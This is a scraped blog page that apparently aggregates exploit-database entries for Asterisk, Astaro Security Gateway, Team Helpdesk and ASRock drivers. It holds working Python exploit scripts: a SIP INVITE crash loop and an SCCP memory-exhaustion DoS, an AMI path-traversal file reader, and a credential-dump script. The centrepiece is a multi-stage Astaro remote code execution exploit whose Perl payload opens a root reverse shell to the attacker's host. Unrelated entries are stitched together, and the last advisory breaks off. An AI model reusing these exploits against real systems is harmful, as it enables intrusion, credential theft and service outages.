'''
# Crash occurs when sending a repeated number of INVITE messages over TCP or TLS transport
- Authors:
- Alfred Farrugia <alfred@enablesecurity.com>
- Sandro Gauci <sandro@enablesecurity.com>
- Latest vulnerable version: Asterisk 15.2.0 running `chan_pjsip` installed with `--with-pjproject-bundled`
- References: AST-2018-005, CVE-2018-7286
- Enable Security Advisory: <https://github.com/EnableSecurity/advisories/tree/master/ES2018-04-asterisk-pjsip-tcp-segfault>
- Vendor Advisory: <http://downloads.asterisk.org/pub/security/AST-2018-005.html>
- Tested vulnerable versions: 15.2.0, 15.1.0, 15.0.0, 13.19.0, 13.11.2, 14.7.5
- Timeline:
- Issue reported to vendor: 2018-01-24
- Vendor patch made available to us: 2018-02-05
- Vendor advisory published: 2018-02-21
- Enable Security advisory: 2018-02-22
## Description
A crash occurs when a number of INVITE messages are sent over TCP or TLS and
then the connection is suddenly closed. This issue leads to a segmentation fault.
## Impact
Abuse of this vulnerability leads to denial of service in Asterisk when
`chan_pjsip` is in use.
## How to reproduce the issue
The following script was used to reproduce the issue on a TLS connection:
'''
python
import md5
import re
import socket
import ssl
import uuid
from time import sleep
SERVER_IP = "127.0.0.1"
SERVER_PORT = 5061
USERNAME = "3000"
PASSWORD = "3000"
INVITE_USERNAME = "3000"
errno = 0
lasterrno = 0
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = ssl.wrap_socket(sock,
ssl_version=ssl.PROTOCOL_TLSv1,
)
sock.connect((SERVER_IP, SERVER_PORT))
sock.settimeout(0.5)
errno = 0
callid = str(uuid.uuid4())
for ix in range(10):
sdpbody = ""
msg = "INVITE sip:%s@%s:%i SIP/2.0\r\n" \
"To: <sip:%s@%s:%i>\r\n" \
"From: Test <sip:%s@%s:%s>\r\n" \
"Call-ID: %s\r\n" \
"CSeq: 2 INVITE\r\n" \
"Via: SIP/2.0/TLS 172.17.0.1:10394;branch=z9hG4bK%s\r\n" \
"Contact: <sip:%s@172.17.0.1>\r\n" \
"Content-Type: application/sdp\r\n" \
"{{AUTH}}" \
"Content-Length: %i\r\n" \
"\r\n" % (
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
INVITE_USERNAME, SERVER_IP, SERVER_PORT,
USERNAME, SERVER_IP, SERVER_PORT,
callid, callid,
USERNAME, len(sdpbody)
) + \
sdpbody
sock.sendall(msg.replace("{{AUTH}}", ""))
data = sock.recv(10240)
# print(data)
if data.startswith("SIP/2.0 401"):
for line in data.split('\r\n'):
if line.startswith("WWW-Authenticate"):
content = line.split(':', 2)[1].strip()
realm = re.search(
"realm=\"([a-z]+)\"", content).group(1)
nonce = re.search(
"nonce=\"([a-z0-9\/]+)\"", content).group(1)
ha1 = md5.new(USERNAME + ":" + realm +
":" + PASSWORD).hexdigest()
uri = "sip:%s:%i" % (SERVER_IP, SERVER_PORT)
ha2 = md5.new("INVITE:" + uri).hexdigest()
r = md5.new(ha1 + ":" + nonce + ":" + ha2).hexdigest()
auth = "Authorization: Digest username=\"%s\"," % (USERNAME) + \
"realm=\"%s\"," % (realm) + \
"nonce=\"%s\"," % (nonce) + \
"uri=\"%s\"," % (uri) + \
"response=\"%s\"," % (r) + \
"algorithm=md5\r\n"
print(auth)
sock.sendall(msg.replace("{{AUTH}}", auth))
errno = 0
except (socket.error, ssl.SSLEOFError), err:
print(err)
print("getting close!")
sleep(2)
errno += 1
if errno >= 10:
print("confirmed dead")
break
elif errno > lasterrno:
lasterrno = errno
continue
'''
The output from the tool should show the following:
```
> python test.py
Authorization: Digest username="3000",realm="asterisk",nonce="1516728889/07e2e34fbd45ed7f6b1bca0d2bde50ae",uri="sip:127.0.0.1:5061",response="a2b7e2bfa722730b64787664db474f2a",algorithm=md5
EOF occurred in violation of protocol (_ssl.c:590)
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
[Errno 111] Connection refused
getting close!
confirmed dead
```
Notes:
- authentication may be required
- the destination SIP address should match a valid extension in the dialplan
- similar code to the above can be used to reproduce the issue on TCP transport
### GDB backtrace result
```
gdb --args /opt/asterisk/sbin/asterisk -fcvvv
Thread 25 "asterisk" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff030a700 (LWP 133)]
ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
3956 if (!tdata->dest_info.addr.count || (tdata->dest_info.cur_addr == tdata->dest_info.addr.count - 1)) {
(gdb) bt
#0 ast_sip_failover_request (tdata=0x0) at res_pjsip.c:3956
#1 0x00007ffff1a8dbb1 in check_request_status (inv=inv@entry=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3371
#2 0x00007ffff1a8dc83 in session_inv_on_state_changed (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at res_pjsip_session.c:3455
#3 0x00007ffff7848217 in inv_set_state (state=PJSIP_INV_STATE_DISCONNECTED, e=0x7ffff0308ae0, inv=0x7fff9910bac8) at ../src/pjsip-ua/sip_inv.c:317
#4 inv_on_state_null (inv=0x7fff9910bac8, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:3890
#5 0x00007ffff7841a77 in mod_inv_on_tsx_state (tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip-ua/sip_inv.c:717
#6 0x00007ffff788299d in pjsip_dlg_on_tsx_state (dlg=0x7fff990eccc8, tsx=0x7fff99116408, e=0x7ffff0308ae0) at ../src/pjsip/sip_dialog.c:2066
#7 0x00007ffff787b513 in tsx_set_state (tsx=0x7fff99116408, state=PJSIP_TSX_STATE_TERMINATED, event_src_type=PJSIP_EVENT_TRANSPORT_ERROR, event_src=0x7fff9910fda8, flag=0)
at ../src/pjsip/sip_transaction.c:1267
#8 0x00007ffff787cfec in send_msg_callback (send_state=0x7fff9918d2f0, sent=-171064, cont=0x7ffff0308c04) at ../src/pjsip/sip_transaction.c:1970
#9 0x00007ffff78661ae in send_response_resolver_cb (status=<optimized out>, token=0x7fff9918d2f0, addr=0x7ffff0308c60) at ../src/pjsip/sip_util.c:1721
#10 0x00007ffff184df8c in sip_resolve (resolver=<optimized out>, pool=<optimized out>, target=0x7fff99116530, token=0x7fff9918d2f0, cb=0x7ffff78660f0 <send_response_resolver_cb>)
at res_pjsip/pjsip_resolver.c:527
#11 0x00007ffff7869adb in pjsip_resolve (resolver=0x1b64d40, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209
#12 0x00007ffff78652b9 in pjsip_endpt_resolve (endpt=endpt@entry=0x1638d28, pool=<optimized out>, target=target@entry=0x7fff99116530, token=token@entry=0x7fff9918d2f0,
cb=cb@entry=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164
#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, res_addr=res_addr@entry=0x7fff99116508, tdata=tdata@entry=0x7fff9910fda8, token=token@entry=0x7fff99116408,
cb=cb@entry=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796
#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237
#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704
#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634
#17 0x00007ffff787fba7 in pjsip_tsx_send_msg (tsx=tsx@entry=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789
#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, tdata=tdata@entry=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531
#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231
#20 0x00007ffff1a8c043 in ast_sip_session_send_response (session=session@entry=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712
#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963
#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062
#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126
#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, rdata=rdata@entry=0x7fff9524ce58, p=p@entry=0x7ffff1a7ed00 <param>,
p_handled=p_handled@entry=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893
#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903
#26 0x00000000005fc6fe in ast_taskprocessor_execute (tps=tps@entry=0x1cf2b08) at taskprocessor.c:963
#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322
#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963
#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351
#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105
#31 worker_start (arg=arg@entry=0x7fffa0000948) at threadpool.c:1024
#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257
#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333
#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109
(gdb)
```
## Solutions and recommendations
Apply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.
## About Enable Security
[Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
## Disclaimer
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
'''
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113859
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
# Date: 2023-03-26
# Exploit Author: Sean Pesce
# Vendor Homepage: https://asterisk.org/
# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
# Version: 18.20.0
# Tested on: Debian Linux
# CVE: CVE-2023-49294
#!/usr/bin/env python3
#
# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
# to the common INI configuration format.
#
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2023-49294
# https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
# https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/
import argparse
import getpass
import socket
import sys
CVE_ID = 'CVE-2023-49294'
DEFAULT_PORT = 5038
DEFAULT_FILE = '/etc/hosts'
DEFAULT_ACTION_ID = 0
DEFAULT_TCP_READ_SZ = 1048576 # 1MB
def ami_msg(action, args, encoding='utf8'):
assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}'
assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}'
if 'ActionID' not in args:
args['ActionID'] = 0
line_sep = '\r\n'
data = f'Action: {action}{line_sep}'
for a in args:
data += f'{a}: {args[a]}{line_sep}'
data += line_sep
return data.encode(encoding)
def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):
assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}'
sock.sendall(data)
resp = b''
while not resp.endswith(b'\r\n\r\n'):
resp += sock.recv(read_sz)
return resp
if __name__ == '__main__':
# Parse command-line arguments
argparser = argparse.ArgumentParser()
argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server')
argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT)
argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True)
argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None)
argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE)
argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID)
if '-h' in sys.argv or '--help' in sys.argv:
print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr)
argparser.print_help()
sys.exit(0)
args = argparser.parse_args()
# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')
print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr)
# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))
# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)
# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)
# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
'ActionID': args.action_id,
'Filename': f'{traversal}{args.file}',
#'Category': 'default',
#'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
resp = tcp_send_rcv(sock, b'')
print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')
if b'Error' in resp:
sys.exit(1)
pass # Done
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
# CVE-2017-17090 - AST-2017-013
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application
# handles crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
# helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000
import binascii
import sys
import socket
import time
def asteriskSCCP(target,port):
try:
while 1:
# Open socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set reuse ON
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind port
s.connect((target, port))
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
packet =
binascii.unhexlify(b'450002c50001000040067a307f0000017f000001001407d00000000000000000500220009a2b0000e4eea8a72a97467d3631824ac1c08c604e762eb80af46cc6d219a4cf65c13992b4a8af94cb5e87c14faf0254cba25af9fb33bd8d2a58e370e3a866639dfdec350875cfecfe068a16746963fffeee0fdcbac75eb4f09d625f3ae1b4a3eb2812e6f838e88b0d7d9881465a0faf45664df8008d4d6de1a5e20a9c97a71f57d3429e0b17db3aeb3bf516ca4e207a5c801d04132979508f267c7425a57fd0edd271b57ff9831b595b519e73404f170492ae3ad438d4aeca854e96c9dd56d2af3813b8de6b3d8d31d32c0e95be9cb3a5c6106f64c4f19cda2b55ad1471f3d63e1b1ca3c29f362def063ad9b29ea4d1c1fda5c2e4cf0ae75064c27411a2deb5fab11e6412cd5a4037f38779f0173fa1f2ca1740aa78fe37bc0a50f5619c7abba00f2957bf06770ff4d6c003d4533de19f51bcbbd9bbe0ceb3e17dd180e58ee2698998edca42e3d6a8079cc151b608e5bd5aff052e718e714b360f9b091894a5eeed34dafe41d27f19988b3e0ac5a6dd8947c3537ae31154e983cdbac0861afc500206e74030c9e452738ece13075df2dbebb8a1737ee3b4880bc6d428ee2d3d64f585e197dc63f30638a4c55cff0b8e6aa82dfdf199baabd92c10092414015fad5f08e9c816a4d028574ee5340c08b2fe65ca1e7ca907ea2ebd6661e01e9b9d39d5bdb3e3cebd58e96f97f487bb580bcf5447ac48a2ad5541ae0ddcc9ec1f9528f2c07316dbd760e91e3bddbd53fbf6987fdba0830bdb485524950b5611e18e5d517c0f3ae05aa2daec42a5c43eab07aa0018ab750dc6995adad6561cc8a0379f7a12d8e5e474df013459442801d6871c5820318d790833687619b70b0da74893ca441f177ab9e7d7a537c6ff4920c79631905c35167d8a6efc0c6bced9270691abc5b4de84f956f8c1d34f9ef3f0073dafce8c076c4d537e981a1e8ff6ed3e8c')
# Log the packet in hexa and timestamp
fileLog = target + ".log"
logPacket = open(fileLog, "w+")
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
logPacket.close()
# Write bytecodes to socket
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
s.send(bytes(packet))
# Packet sent:
print(bytes(packet))
try:
data = s.recv(4096)
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
except socket.error, e:
print 'Sorry, No data available'
continue
s.close()
except socket.error as error:
print error
print "Sorry, something went wrong!"
def howtouse():
print "Usage: AsteriskSCCP.py Hostname Port"
print "[*] Mandatory arguments:"
print "[-] Specify a hostname / port"
sys.exit(-1)
if __name__ == "__main__":
try:
# Set target
target = sys.argv[1]
port = int(sys.argv[2])
print "[*] Asterisk 13.17 Exploit by Juan Sacco <jsacco@exploitpack.com "
asteriskSCCP(target, port)
except IndexError:
howtouse()
source: https://www.securityfocus.com/bid/47676/info
Asterisk is prone to a user-enumeration weakness.
An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.
This issue affects Asterisks 1.8.
The following request is available:
INVITE sip:192.168.2.1 SIP/2.0
CSeq: 3 INVITE
Via: SIP/2.0/UDP www.example.com:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:105@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2
To: <sip:500@192.168.2.1>
Contact: <sip:105@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 0
Max-Forwards: 70
source: https://www.securityfocus.com/bid/48008/info
Asterisk is prone to a user-enumeration weakness.
An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.
This issue affects Asterisk 1.8.4.1; other versions may also be affected.
REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:500@192.168.2.1>
Refer-To: sip:500@192.168.2.1
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70
source: https://www.securityfocus.com/bid/51301/info
Astaro Security Gateway is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user.
Astaro Security Gateway 8.1 is vulnerable; other versions may also be affected.
<div style="left: 300px; top: 220px; z-index: 2000; visibility: visible;" class="iPopUp" id="iPopup_2"><div
class="iPopUpTitle">Please confirm:</div><div class="iPopUpText"><p>​​​​​Are you sure
that you want to delete the X509 certificate
with private key object '>"<INCLUDED PERSISTENT SCRIPTCODE HERE!!!">'?</p></iframe></p></div><table border="0"
cellpadding="0" cellspacing="0"><tbody><tr><td style="padding: 2px;"><div id="btnDefault_iPopup_2" class="button"
style="width:
auto; cursor: pointer; color: black; font-weight: bold;"><div class="button_left"></div><div class="button_center"
style="width:
auto;"><span style="font-weight: normal;">OK</span></div><div
class="button_right"></div></div></td>​​​​​<td style="padding:
2px;"><div class="button" style="width: auto; cursor: pointer; color: black;"><div class="button_left"></div><div
class="button_center" style="width: auto;"><span style="font-weight: normal;">Cancel</span></div><div
class="button_right"></div></div></td></tr></tbody></table></div>
../index.dat
#!/usr/bin/python
# Astaro Security Gateway v7 - Unauthenticated Remote Code Execution
# Exploit Authors: Jakub Palaczynski and Maciej Grabiec
# Tested on versions: 7.500 and 7.506
# Date: 13.12.2016
# Vendor Homepage: https://www.sophos.com/
# CVE: CVE-2017-6315
import socket
import sys
import os
import threading
import subprocess
import time
# print help or assign arguments
if len(sys.argv) != 3:
sys.stderr.write("[-]Usage: python %s <our_ip> <remote_ip:port>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0])
sys.exit(1)
lhost = sys.argv[1] # our ip address
rhost = sys.argv[2] # ip address and port of vulnerable ASG v7
# for additional thread to send requests in parallel
class requests (threading.Thread):
def run(self):
print 'Sending requests to trigger vulnerability.'
time.sleep(5)
# first request to clear cache
os.system('curl -s -m 5 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':81"}\' -k > /dev/null')
# second request to trigger reverse connection
os.system('curl -s -m 20 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':80"}\' -k > /dev/null')
# function that creates socket
def create_socket(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
sock.listen(10)
conn, addr = sock.accept()
return sock, conn, addr
# function to receive data from socket
def receive(conn):
sys.stdout.write(conn.recv(1024))
sys.stdout.flush()
sys.stdout.write(conn.recv(1024))
sys.stdout.flush()
# Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl
# This script creates serialized object that makes reverse connection and executes everything what it receives on a socket
file = """
#!/usr/bin/perl
use strict;
use MIME::Base64 qw( encode_base64 );
use Storable qw( nfreeze );
use LWP::UserAgent;
my $package_name = "A" x 252;
my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~;
eval($pack);
my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~;
my $padding = length($package_name) - length($payload);
$payload = $payload . (";" x $padding);
my $data = bless { ignore => 'this' }, $package_name;
my $frozen = nfreeze($data);
$frozen =~ s/$package_name/$payload/g;
my $encodedSize = length($frozen);
my $pakiet = print(pack("N", $encodedSize), $frozen);
print "$frozen";
"""
# save file, run perl script and save our serialized payload
f = open("payload.pl", "w")
f.write(file)
f.close()
serialized = os.popen("perl ./payload.pl").read()
os.remove("./payload.pl")
# start thread that sends requests
thread = requests()
thread.start()
# open socket that receives connection from index
sock, conn, addr = create_socket(80)
print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.'
print 'Sending 1st stage payload.'
data = conn.recv(256)
# say hello to RPC client
conn.sendall(data)
data = conn.recv(256)
# send serialized object that initiates connect back connection and executes everything what it receives on a socket
conn.sendall(serialized)
sock.close()
# create second socket that receives connection from index and sends additional commands
sock, conn, addr = create_socket(443)
print 'Sending 2nd stage payload.'
# send commands that exploit confd (running with root permissions) which is running on localhost - the same exploitation as for first stage
conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n')
sock.close()
# create socket that receives connection from confd and sends commands to get reverse shell
sock, conn, addr = create_socket(443)
print 'Sending 3rd stage payload.'
# send reverse shell payload
conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n')
sock.close()
# create socket to receive shell with root permissions
print '\nNow you need to wait for shell.'
sock, conn, addr = create_socket(443)
receive(conn)
while True:
cmd = raw_input("")
if cmd == 'exit':
break
else:
conn.send(cmd + "\n")
receive(conn)
sock.close()
source: https://www.securityfocus.com/bid/67271/info
AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities.
Successfully exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks.
Team Helpdesk 8.3.5 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import sys
import re
import os
import subprocess
print "This is an User Credential Dump for Team Helpdesk Customer Wev Service 8.3.5 (and prior) by bhamb.\n"
print "Send any comment to ccb3b72@gmail.com\n"
if len(sys.argv) != 2:
print('Usage: user_cred_dump.py https://Hostname.com')
exit(1)
hostname=sys.argv[1]+"/cws/bin/cwacallers.xml"
print hostname
subprocess.Popen(['wget', '--no-check-certificate',hostname]).communicate()
print "The following usernames and encrypted password were found.\n"
cmd="cat cwacallers.xml | grep '@' | cut -d'\"' -f4,6 | sed 's/\"/:/g' "
test=os.system(cmd)
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/
ASRock Drivers Elevation of Privilege Vulnerabilities
1. *Advisory Information*
Title: ASRock Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0005
Advisory URL: https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
Date published: 2018-10-25
Date of last update: 2018-10-25
Vendors contacted: ASRock
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712
3. *Vulnerability Description*
ASRock's website states that [1]:
ASRock Inc. is established in 2002, specialized in the field of
motherboards. With the 3C design concept, Creativity, Consideration,
Cost-effectiveness, the company explores the limit of motherboards
manufacturing while paying attention on the eco issue at the same
time, developing products with the consideration of eco-friendly
concept. ASRock has been growing fast and become world third largest
motherboard brand with headquarter in Taipei, Taiwan and branches in
Europe and the USA.
ASRock offers several utilities designed to give the user with an ASRock
motherboard more control over certain settings and functions.
These utilities include various features like the RGB LED control,
hardware monitor, fan controls, and overclocking/voltage options.
Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys
low level drivers, installed by ASRock RGBLED and other ASRock branded
utilities, which could allow a local attacker to elevate privileges.
4. *Vulnerable Packages*
. ASRock RGBLED before v1.0.35.1
. A-Tuning before v3.0.210
. F-Stream before v3.0.210
. RestartToUEFI before v1.0.6.2
5. *Vendor Information, Solutions and Workarounds*
ASRock published the following fixed applications for each of its
motherboards models:
. ASRock RGBLED v1.0.36
. A-Tuning v3.0.216
. F-Stream v3.0.216
. RestartToUEFI v1.0.7
Downloads are available on the ASRock website.
6. *Credits*
These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo
from SecureAuth Advisories Team.
7. *Technical Description / Proof of Concept Code*
